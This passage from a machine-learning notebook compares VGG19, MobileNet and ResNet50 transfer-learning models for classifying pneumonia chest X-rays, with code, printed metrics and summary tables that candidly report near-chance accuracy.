vgg_model_frozen.add(layer)
vgg_model_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_frozen.layers[:-4]:
layer.trainable = False
vgg_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_frozen_history = vgg_model_frozen.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model, y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_frozen, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_frozen_acc_scores.append(acc)
vgg_frozen_prec_scores.append(prec)
vgg_frozen_recall_scores.append(recall)
vgg_frozen_f1_scores.append(f1)
print('Accuracy of VGG model with last 4 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_frozen_acc_scores) * 100, np.std(vgg_frozen_acc_scores)*100))
print('Precision of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_prec_scores), np.std(vgg_frozen_prec_scores)))
print('Recall of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_recall_scores), np.std(vgg_frozen_recall_scores)))
print('f1 score of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_f1_scores), np.std(vgg_frozen_f1_scores)))
###Output
Accuracy of VGG model with last 4 layers trained: 53.75 +/- 0.43%
Precision of VGG model with last 4 layers trained: 0.525 +/- 0.006
Recall of VGG model with last 4 layers trained: 0.800 +/- 0.105
f1 score of VGG model with last 4 layers trained: 0.631 +/- 0.031
###Markdown
3.1.3 - Adding Augmented Images to the VGG19 Model with Pneumonia Images

So far, I've been able to get an OK f1 score, but an accuracy of 55% concerns me because that's barely better than randomly guessing whether an image shows pneumonia or not. I believe part of that is the low number of images in the training set, a total of 1752 images; a deep learning model normally wants hundreds of thousands of images. To help with this, I can generate new images from the ones I already have by altering them. The alterations are defined in the ImageDataGenerator below, but to summarize, the generator can zoom, shift the image horizontally, or shift the image vertically. If the image is shifted, black pixels fill in the empty space.

As usual, I want to get a baseline for this augmented-image model. Unfortunately, the metrics are similar to the non-augmented baseline scores.
###Code
gen = ImageDataGenerator(zoom_range=0.05,
height_shift_range=0.05,
width_shift_range=0.05,
fill_mode = 'constant',
cval = 0)
vgg_aug_baseline_acc_scores = []
vgg_aug_baseline_prec_scores = []
vgg_aug_baseline_recall_scores = []
vgg_aug_baseline_f1_scores = []
for i in range(3):
vgg_model_aug_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_baseline.add(layer)
vgg_model_aug_baseline.add(Dense(num_classes, activation = 'softmax'))
for layer in vgg_model_aug_baseline.layers:
layer.trainable = False
vgg_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_baseline_history = vgg_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_baseline, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_aug_baseline_acc_scores.append(acc)
vgg_aug_baseline_prec_scores.append(prec)
vgg_aug_baseline_recall_scores.append(recall)
vgg_aug_baseline_f1_scores.append(f1)
print('Accuracy of VGG augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_baseline_acc_scores) * 100, np.std(vgg_aug_baseline_acc_scores)*100))
print('Precision of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_prec_scores), np.std(vgg_aug_baseline_prec_scores)))
print('Recall of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_recall_scores), np.std(vgg_aug_baseline_recall_scores)))
print('f1 score of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_f1_scores), np.std(vgg_aug_baseline_f1_scores)))
###Output
Accuracy of VGG augmented baseline model: 51.08 +/- 0.79%
Precision of VGG augmented baseline model: 0.548 +/- 0.022
Recall of VGG augmented baseline model: 0.245 +/- 0.286
f1 score of VGG augmented baseline model: 0.244 +/- 0.237
###Markdown
Again, I'd like to fine-tune the augmented-image model by letting some layers be trainable. I found the optimal number of trainable layers to be 5. The accuracy of the augmented model with trainable layers is slightly higher, but the standard deviation is also larger, and the precision, recall, and f1 score are the same as or lower than those of the baseline model with trainable layers.
###Code
vgg_aug_frozen_acc_scores = []
vgg_aug_frozen_prec_scores = []
vgg_aug_frozen_recall_scores = []
vgg_aug_frozen_f1_scores = []
for i in range(3):
vgg_model_aug_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_frozen.add(layer)
vgg_model_aug_frozen.add(Dense(num_classes, activation = 'softmax'))
for layer in vgg_model_aug_frozen.layers[:-5]:
layer.trainable = False
vgg_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_frozen_history = vgg_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_frozen, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_aug_frozen_acc_scores.append(acc)
vgg_aug_frozen_prec_scores.append(prec)
vgg_aug_frozen_recall_scores.append(recall)
vgg_aug_frozen_f1_scores.append(f1)
print('Accuracy of VGG augmented model with last 5 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_frozen_acc_scores) * 100, np.std(vgg_aug_frozen_acc_scores)*100))
print('Precision of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_prec_scores), np.std(vgg_aug_frozen_prec_scores)))
print('Recall of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_recall_scores), np.std(vgg_aug_frozen_recall_scores)))
print('f1 score of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_f1_scores), np.std(vgg_aug_frozen_f1_scores)))
###Output
Accuracy of VGG augmented model with last 5 layers trained: 54.14 +/- 1.30%
Precision of VGG augmented model with last 5 layers trained: 0.538 +/- 0.004
Recall of VGG augmented model with last 5 layers trained: 0.573 +/- 0.141
f1 score of VGG augmented model with last 5 layers trained: 0.546 +/- 0.074
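###Markdown
As an aside, the per-model score lists collected above can be assembled into a comparison table programmatically. A minimal sketch (shown for two of the VGG variants, assuming the score lists defined earlier in this notebook; accuracy is shown as a fraction rather than a percentage):
###Code
# Sketch: build a mean +/- std comparison table from the collected score lists
def summarize(name, accs, precs, recalls, f1s):
    fmt = lambda s: '{:0.3f} +/- {:0.3f}'.format(np.mean(s), np.std(s))
    return {'Model': name, 'Accuracy': fmt(accs), 'Precision': fmt(precs),
            'Recall': fmt(recalls), 'F1-score': fmt(f1s)}
pd.DataFrame([
    summarize('VGG19 baseline', vgg_baseline_acc_scores, vgg_baseline_prec_scores,
              vgg_baseline_recall_scores, vgg_baseline_f1_scores),
    summarize('VGG19 baseline with training', vgg_frozen_acc_scores, vgg_frozen_prec_scores,
              vgg_frozen_recall_scores, vgg_frozen_f1_scores),
])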
###Markdown
3.1.4 - VGG19 Summary for Pneumonia Images

A table summarizing the metrics of the VGG models for pneumonia is below. Overall, it shows that the best VGG model is the baseline model with the last 4 layers trained, as it has the highest recall and f1-score.

| Model | Accuracy | Precision | Recall | F1-score |
|------|------|------|------|------|
| VGG19 baseline | 49.50 +/- 1.29% | 0.545 +/- 0.055 | 0.236 +/- 0.279 | 0.229 +/- 0.226 |
| VGG19 baseline with training | 53.75 +/- 0.43% | 0.525 +/- 0.006 | 0.800 +/- 0.105 | 0.631 +/- 0.031 |
| VGG19 augmented baseline | 51.08 +/- 0.79% | 0.548 +/- 0.022 | 0.245 +/- 0.286 | 0.244 +/- 0.237 |
| VGG19 augmented with training | 54.14 +/- 1.30% | 0.538 +/- 0.004 | 0.573 +/- 0.141 | 0.546 +/- 0.074 |

3.2 - MobileNet Model

The next model to try is the MobileNet model. This model also expects images of 224 x 224, so the training and test sets are already set up.

3.2.1 - MobileNet Baseline with Pneumonia Images

The rest of the notebook follows the same steps as the VGG model, so here I'll establish the baseline metrics for MobileNet. Here I use the argument include_top = False. Compared to the original MobileNet model, however, this takes away the last two layers instead of just one. To make up for this, I have to add the GlobalAveragePooling2D layer back in. For MobileNet's baseline, accuracy is again ~50%, the precision is slightly worse, and the recall and f1 score are slightly better than VGG's baseline. All of these metrics are lower than those of the best VGG model.
###Code
mobilenet_model = MobileNet(include_top=False, input_shape=(imgSize, imgSize, 3))
mobilenet_baseline_acc_scores = []
mobilenet_baseline_prec_scores = []
mobilenet_baseline_recall_scores = []
mobilenet_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_baseline_acc_scores.append(acc)
mobilenet_baseline_prec_scores.append(prec)
mobilenet_baseline_recall_scores.append(recall)
mobilenet_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_baseline_acc_scores) * 100, np.std(mobilenet_baseline_acc_scores)*100))
print('Precision of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_prec_scores), np.std(mobilenet_baseline_prec_scores)))
print('Recall of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_recall_scores), np.std(mobilenet_baseline_recall_scores)))
print('f1 score of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_f1_scores), np.std(mobilenet_baseline_f1_scores)))
###Output
Accuracy of MobileNet baseline model: 50.47 +/- 2.28%
Precision of MobileNet baseline model: 0.488 +/- 0.079
Recall of MobileNet baseline model: 0.344 +/- 0.314
f1 score of MobileNet baseline model: 0.325 +/- 0.231
###Markdown
3.2.2 - MobileNet Training Layers with Pneumonia Images

There are ~85 layers in the MobileNet model, so it's more difficult to find the sweet spot for how many layers to train compared to VGG. Due to time, I trained up to the last 25 layers, and found the optimal number of trainable layers to be 21. Accuracy is slightly higher, at ~53%, but the precision stays the same as MobileNet's baseline. Its recall and f1 scores, however, have improved to at least 0.6, and the standard deviations are generally more stable.
###Code
mobilenet_frozen_acc_scores = []
mobilenet_frozen_prec_scores = []
mobilenet_frozen_recall_scores = []
mobilenet_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers[:-21]:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_frozen_acc_scores.append(acc)
mobilenet_frozen_prec_scores.append(prec)
mobilenet_frozen_recall_scores.append(recall)
mobilenet_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet model with last 21 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_frozen_acc_scores) * 100, np.std(mobilenet_frozen_acc_scores)*100))
print('Precision of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_prec_scores), np.std(mobilenet_frozen_prec_scores)))
print('Recall of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_recall_scores), np.std(mobilenet_frozen_recall_scores)))
print('f1 score of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_f1_scores), np.std(mobilenet_frozen_f1_scores)))
###Output
Accuracy of MobileNet model with last 21 layers trained: 53.78 +/- 0.32%
Precision of MobileNet model with last 21 layers trained: 0.522 +/- 0.003
Recall of MobileNet model with last 21 layers trained: 0.876 +/- 0.069
f1 score of MobileNet model with last 21 layers trained: 0.653 +/- 0.018
###Markdown
3.2.3 - Adding Augmented Images to MobileNet with Pneumonia Images

The metrics for the baseline augmented MobileNet model are similar to those of the non-augmented model. One thing to note from the confusion matrices is that the model tends to classify everything as either all 0 or all 1 (not pneumonia vs. pneumonia).
###Code
mobilenet_aug_baseline_acc_scores = []
mobilenet_aug_baseline_prec_scores = []
mobilenet_aug_baseline_recall_scores = []
mobilenet_aug_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_baseline.layers:
layer.trainable = False
mobilenet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_baseline_history = mobilenet_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_aug_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_aug_baseline_acc_scores.append(acc)
mobilenet_aug_baseline_prec_scores.append(prec)
mobilenet_aug_baseline_recall_scores.append(recall)
mobilenet_aug_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_baseline_acc_scores) * 100, np.std(mobilenet_aug_baseline_acc_scores)*100))
print('Precision of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_prec_scores), np.std(mobilenet_aug_baseline_prec_scores)))
print('Recall of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_recall_scores), np.std(mobilenet_aug_baseline_recall_scores)))
print('f1 score of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_f1_scores), np.std(mobilenet_aug_baseline_f1_scores)))
###Output
Accuracy of MobileNet augmented baseline model: 49.65 +/- 0.19%
Precision of MobileNet augmented baseline model: 0.405 +/- 0.085
Recall of MobileNet augmented baseline model: 0.341 +/- 0.461
f1 score of MobileNet augmented baseline model: 0.240 +/- 0.300
###Markdown
Fine-tuning the layers and finding a sweet spot was very difficult for the augmented MobileNet model. At the moment, the best model I found trains the last 11 layers. This gives scores similar to those of the non-augmented MobileNet with trained layers, but with larger standard deviations.
###Code
mobilenet_aug_frozen_acc_scores = []
mobilenet_aug_frozen_prec_scores = []
mobilenet_aug_frozen_recall_scores = []
mobilenet_aug_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_frozen.layers[:-11]:
layer.trainable = False
mobilenet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_frozen_history = mobilenet_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_aug_frozen,
X_test_pneu_model,
y_test_pneu)
mobilenet_aug_frozen_acc_scores.append(acc)
mobilenet_aug_frozen_prec_scores.append(prec)
mobilenet_aug_frozen_recall_scores.append(recall)
mobilenet_aug_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet augmented model while training last 11 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_frozen_acc_scores) * 100, np.std(mobilenet_aug_frozen_acc_scores)*100))
print('Precision of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_prec_scores), np.std(mobilenet_aug_frozen_prec_scores)))
print('Recall of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_recall_scores), np.std(mobilenet_aug_frozen_recall_scores)))
print('f1 score of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_f1_scores), np.std(mobilenet_aug_frozen_f1_scores)))
###Output
Accuracy of MobileNet augmented model while training last 11 layers: 53.05 +/- 1.12%
Precision of MobileNet augmented model while training last 11 layers: 0.521 +/- 0.010
Recall of MobileNet augmented model while training last 11 layers: 0.797 +/- 0.123
f1 score of MobileNet augmented model while training last 11 layers: 0.626 +/- 0.029
###Markdown
3.2.4 - MobileNet Summary for Pneumonia Images

A table summarizing the results of each of the MobileNet models is below. The two models with trained layers had similar f1-scores, but the baseline model with trained layers had a much higher recall, leading me to pick it as the better model.

| Model | Accuracy | Precision | Recall | F1-score |
|------|------|------|------|------|
| MobileNet baseline | 50.47 +/- 2.28% | 0.488 +/- 0.079 | 0.344 +/- 0.314 | 0.325 +/- 0.231 |
| MobileNet baseline with training | 53.78 +/- 0.32% | 0.522 +/- 0.003 | 0.876 +/- 0.069 | 0.653 +/- 0.018 |
| MobileNet augmented baseline | 49.65 +/- 0.19% | 0.405 +/- 0.085 | 0.341 +/- 0.461 | 0.240 +/- 0.300 |
| MobileNet augmented with training | 53.05 +/- 1.12% | 0.521 +/- 0.010 | 0.797 +/- 0.123 | 0.626 +/- 0.029 |

3.3 - ResNet50 Model

Lastly, we have a ResNet model, specifically ResNet50. I chose this model because it gets good results on most image recognition problems.

3.3.1 - ResNet Baseline with Pneumonia Images

Similarly to MobileNet, I use the include_top = False argument and add the GlobalAveragePooling2D and Dense layers. This model also expects an image size of 224 x 224. I had high hopes that this baseline would be higher than 50%, but it was not to be. The recall is much higher than the other baselines at ~0.86, but I believe this is because the model tends to predict everything as 1 (has pneumonia). This is a good reminder of why you should check confusion matrices.
###Code
resnet_model = ResNet50(include_top=False, input_shape=(imgSize, imgSize, 3))
resnet_baseline_acc_scores = []
resnet_baseline_prec_scores = []
resnet_baseline_recall_scores = []
resnet_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_baseline=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_baseline.layers:
layer.trainable = False
resnet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_baseline_history = resnet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(resnet_model_baseline,
X_test_pneu_model,
y_test_pneu)
resnet_baseline_acc_scores.append(acc)
resnet_baseline_prec_scores.append(prec)
resnet_baseline_recall_scores.append(recall)
resnet_baseline_f1_scores.append(f1)
print('Accuracy of ResNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_baseline_acc_scores) * 100, np.std(resnet_baseline_acc_scores)*100))
print('Precision of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_prec_scores), np.std(resnet_baseline_prec_scores)))
print('Recall of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_recall_scores), np.std(resnet_baseline_recall_scores)))
print('f1 score of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_f1_scores), np.std(resnet_baseline_f1_scores)))
###Output
Accuracy of ResNet baseline model: 49.56 +/- 0.65%
Precision of ResNet baseline model: 0.496 +/- 0.005
Recall of ResNet baseline model: 0.862 +/- 0.189
f1 score of ResNet baseline model: 0.622 +/- 0.061
###Markdown
3.3.2 - ResNet50 Training Layers with Pneumonia Images

I found the optimal number of layers to train to be 22, which gives an accuracy that finally breaks past 53%, at ~54%. Not much of an improvement, but I was beginning to wonder if any model could break 53%. The precision, recall, and f1 scores all hover around 0.50.
###Code
resnet_frozen_acc_scores = []
resnet_frozen_prec_scores = []
resnet_frozen_recall_scores = []
resnet_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_frozen.layers[:-22]:
layer.trainable = False
resnet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_frozen_history = resnet_model_frozen.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(resnet_model_frozen,
X_test_pneu_model,
y_test_pneu)
resnet_frozen_acc_scores.append(acc)
resnet_frozen_prec_scores.append(prec)
resnet_frozen_recall_scores.append(recall)
resnet_frozen_f1_scores.append(f1)
print('Accuracy of ResNet model while training last 22 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_frozen_acc_scores) * 100, np.std(resnet_frozen_acc_scores)*100))
print('Precision of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_prec_scores), np.std(resnet_frozen_prec_scores)))
print('Recall of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_recall_scores), np.std(resnet_frozen_recall_scores)))
print('f1 score of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_f1_scores), np.std(resnet_frozen_f1_scores)))
###Output
Accuracy of ResNet model while training last 22 layers: 54.47 +/- 2.17%
Precision of ResNet model while training last 22 layers: 0.549 +/- 0.021
Recall of ResNet model while training last 22 layers: 0.493 +/- 0.214
f1 score of ResNet model while training last 22 layers: 0.496 +/- 0.120
###Markdown
3.3.3 - Adding Augmented Images to ResNet Model with Pneumonia ImagesAgain, not much improvement here over the ResNet baseline model without augmented images. In fact, every metric aside from accuracy has a worse score with a larger standard deviation.
###Code
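# `gen` below is the Keras ImageDataGenerator configured earlier in the
# notebook; its exact settings are an assumption here, but it would look
# something like: gen = ImageDataGenerator(rotation_range=10, zoom_range=0.1)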
resnet_aug_baseline_acc_scores = []
resnet_aug_baseline_prec_scores = []
resnet_aug_baseline_recall_scores = []
resnet_aug_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_baseline=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_baseline.layers:
layer.trainable = False
resnet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_baseline_history = resnet_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_baseline,
X_test_pneu_model,
y_test_pneu)
resnet_aug_baseline_acc_scores.append(acc)
resnet_aug_baseline_prec_scores.append(pres)
resnet_aug_baseline_recall_scores.append(recall)
resnet_aug_baseline_f1_scores.append(f1)
print('Accuracy of ResNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_baseline_acc_scores) * 100, np.std(resnet_aug_baseline_acc_scores)*100))
print('Precision of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_prec_scores), np.std(resnet_aug_baseline_prec_scores)))
print('Recall of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_recall_scores), np.std(resnet_aug_baseline_recall_scores)))
print('f1 score of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_f1_scores), np.std(resnet_aug_baseline_f1_scores)))
###Output
Accuracy of ResNet augmented baseline model: 49.71 +/- 1.15%
Precision of ResNet augmented baseline model: 0.487 +/- 0.022
Recall of ResNet augmented baseline model: 0.665 +/- 0.347
f1 score of ResNet augmented baseline model: 0.517 +/- 0.183
###Markdown
The optimal number of layers to train for the ResNet augmented model is 14. While the accuracy still hovers at ~55%, the recall is almost 0.90 with a relatively small standard deviation. However, one must be careful, since the confusion matrices show that the model tends to classify most images as 1 (has pneumonia).
###Code
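# Hedged sketch of the confusion-matrix check mentioned above (assumes
# scikit-learn is available and reuses the test arrays from earlier cells):
def show_confusion(model):
    from sklearn.metrics import confusion_matrix
    preds = np.argmax(model.predict(X_test_pneu_model), axis=1)
    print(confusion_matrix(y_test_pneu, preds))  # rows = true class, cols = predicted class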
resnet_aug_frozen_acc_scores = []
resnet_aug_frozen_prec_scores = []
resnet_aug_frozen_recall_scores = []
resnet_aug_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_frozen.layers[:-14]:
layer.trainable = False
resnet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_frozen_history = resnet_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_frozen,
X_test_pneu_model,
y_test_pneu)
resnet_aug_frozen_acc_scores.append(acc)
resnet_aug_frozen_prec_scores.append(pres)
resnet_aug_frozen_recall_scores.append(recall)
resnet_aug_frozen_f1_scores.append(f1)
print('Accuracy of ResNet augmented model while training 14 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_frozen_acc_scores) * 100, np.std(resnet_aug_frozen_acc_scores)*100))
print('Precision of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_prec_scores), np.std(resnet_aug_frozen_prec_scores)))
print('Recall of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_recall_scores), np.std(resnet_aug_frozen_recall_scores)))
print('f1 score of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_f1_scores), np.std(resnet_aug_frozen_f1_scores)))
###Output
Accuracy of ResNet augmented model while training 14 layers: 55.14 +/- 1.34%
Precision of ResNet augmented model while training 14 layers: 0.530 +/- 0.008
Recall of ResNet augmented model while training 14 layers: 0.899 +/- 0.042
f1 score of ResNet augmented model while training 14 layers: 0.667 +/- 0.013
###Markdown
